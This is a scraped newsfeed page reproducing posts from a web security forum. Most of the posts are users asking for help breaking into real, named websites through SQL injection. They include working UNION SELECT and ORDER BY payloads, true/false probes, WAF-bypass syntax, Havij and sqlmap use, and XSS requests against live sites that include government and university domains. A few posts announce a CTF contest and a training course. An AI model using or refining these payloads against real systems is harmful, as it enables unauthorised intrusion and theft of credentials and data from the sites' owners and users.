sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

Mysql Back-end (no replies)


http://www.costruttori.it/admin/


When I put a ' this page returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.45-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

/admin/index.asp, line 23



It's vulnerable?

what after (no replies)


http://www.itpark.am/firm.php?lang=us&id=1064'

http://www.itpark.am/firm.php?lang=us&id=1064'%20%20order%20by%20100

How to extract the number of columns

again (2 replies)


www.qq.net.au/shop/step1.php?number=859+union+select+1,2,3,4,5,6--

I can't get the column number to appear

Challenge (1 reply)


http://betshemesh.muni.il/pages.php?id=-75+Union+select+1,2,3,4,5,6,7,8,9,10--


Forbidden

Can you do it?

Error displaying page (no replies)


http://www.cavalac.com.ar/indice.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7--

where columns (no replies)


http://souldoll.com/shop/step1.php?number=1211+and+1=1+UNION ALL SELECT 1,2,3,4,5,6--

where columns

why the password can't be read? (no replies)


When I use Havij to inject a bug, username and email are fine, only the password is like this:

=wu?E?
=??
=??80+
=GN?Y"
=G??
=??D?
=wz?&$

What's wrong?

PHDays Online HackQuest 2012 (no replies)


The PHDays 2012 program will include Online HackQuest (http://phdays.com/program/contests/), a competition for the Internet users that offers participants to try their hands at solving various information security tasks. On the forum's second day, Online HackQuest participants will have a chance to influence the results of PHDays CTF 2012, an on-site contest.

Rules
For the competition, participants are provided with access to a VPN gateway. After connecting to it, the participants are to identify target systems and detect their vulnerabilities. If exploitation of a vulnerability is successful, the participant gains access to a key (a flag), which should be submitted to the jury via the form on the participant's personal page. If the flag is valid, the participant gains the corresponding number of points.

All flags are in the MD5 format. The winner is the first participant to gain 100 points (which is the maximum possible amount). Participants who manage to gain more than 100 points are traditionally awarded with individual prizes :)

Participation Terms
Any Internet user is welcome to participate in the competition. The registration will open on the PHDays 2012 web site after the forum begins. Moreover, the Online HackQuest will also be available for out-of-competition participation during 14 days after PHDays 2012.

Prizes
Positive Technologies (the PHDays organizers) and the sponsors of the forum provide prizes and gifts for the competition.

Technical Details
The participation requires Internet connection and a possibility to establish connection to a VPN gateway via PPTP or IPSec.

help me! I've no idea about this SQLi (1 reply)


http://www.unige.ch/sciences/chimie/confs/printconf.php?lang=en&confid=1191

I can't know the column number (no replies)


How do I inject it

http://www.bonk.co.il/article.php?id=433

site take time to respond (5 replies)


this site

www.theavguide.co.uk/view_page.php?page=-18+union+select+1,2,3,4,5,6--

takes a long time to respond

any privet

Sorry, my English is bad

site aspx (no replies)


http://www.fiberplast.com.tr/turkce/urunler.aspx?id=4

a weird injection... (1 reply)


web: http://jsjx.hnie.edu.cn/style.asp?id=1360

The WAF shows that we can't use "and update insert...."

If I inject "http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20manage%29%3E0"

it can show me some information: the table manage does not exist.

But if http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20admin%29%3E0

The WAF will appear.
Any help?????

Internal Server Error (no replies)


site

www.magrabiyemen.com/contents.php?id=-3+union+select+1,2,3,4--

plz help to use order (4 replies)


site

http://www.clearviewgroup.ca/news.php?newsid=(-16)union(select+1,2,3)--


How can I use order to inject this site?

full injection plz

can u help me ? (no replies)


this url:
http://www.xlsoft.com.cn/Product.asp?id=662

tools don't work.

order by 27 >>true
order by 28 >>false

When I use union select, it doesn't work.



can u help me ?

thx!

can't get column number,help...thanks (no replies)


url is http://www.tesociety.org.tw/news/news.php?Sn=151

When I used ' order by 1-- aND '1'='1 , I received the error page...
How can I inject it?

403 Error, WAF Bypass (2 replies)


http://www.vizaginfo.com/others/edu/pgcolleges.asp?id='19

The back-end DBMS is MySQL, but it's hard filtered.
I tried a lot of ways to bypass this, but for me it's really impossible!

Thx
Nerder

XSS (1 reply)


hi

I don't know how I can use xss attack in the following sites:

http://petition.adliran.ir/

and

http://adliran.ir/default_.aspx (I think it doesn't have a xss attack-but not sure)


pls guide me

vulnerable site(maybeeee oracle) (1 reply)


Hi

this site is vulnerable but i can't do it.

please guide me....

http://www.signal4you.com/index.php?option=com_content&task=view&id=926

One of the hardest WAFs I ever saw (1 reply)


www.cybercomp.ba/proizvod.php?ID=1891

I tried a lot of things, the same message "Zastita". Which is "Protection" in English. Echo message -.-

Please anyone know how to bypass this ?

help to inject by sqlmap (no replies)


HI,

I want to inject to below link:

http://adliran.ir/TrmBill/Bill.aspx?CtrlId=Search


please guide me how i can do it.

mysql>5 can't get table_name (2 replies)


http://www.ngclan.hk/news.php?nID=61
http://www.ngclan.hk/news.php?nID=61 UNION SELECT 1,2,3,4,5,6,7-- works well.

mysql>5 can't get column number and DB name! help (2 replies)


http://www.fss.edu.hk/news_content.php?nid=529&sorting=97

how to inject this? (no replies)


http://fzszy.chinacourt.org/public/detail.php?id=168


http://fzszy.chinacourt.org/public/detail.php?id=168'

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /opt/store/file/vhosthttpd/home/fzszy/public_html/public/include.php on line 381

but "and "\"or" can't get error!

The Art of Exploiting SQL Injection: 1 day hands on training at Black Hat US (no replies)


Hello All,

Still a few seats left on the Advanced SQL Injection course at Black Hat.

The course details and registration page can be found here:

https://www.blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_exploiting-sql-injection.html

There is a small video preview here:

http://www.youtube.com/watch?v=6pg-lRv8XTQ

Identify, extract, escalate, execute; we have got it all covered.....

iGuard Biometrics Access Control Webserver Cross Site Scripting (no replies)


iGuard Biometrics Access Control Webserver Cross Site Scripting Zeroday vulnerability !!


http://www.xc0re.net/index.php?p=1_25_iGuard-Biometrics-Access-Control-Webserver-XSS

bypass 406 access denied (2 replies)


Hi,

I have a problem with the target below. I bypassed it (+/*!order*/+/*!by*/+10--) but it doesn't work. Guide me...

http://almas-esf.ir/site/index.php?page=product&productID=4

Very Strange Result. (4 replies)


I think that is vulnerable because when I try to put in the false condition such as AND 1=2 the page changes

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=1 [true]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=2 [false]

and when i try to inject a "ORDER BY" +query

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+3-- [false]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+4-- [true]

The result changes...
and if I try


http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+2--

the result is different...
I'm going crazy for this injection!

I hope that anyone can help me!

BYE
Nerder!

Removed POST (no replies)


Removed POST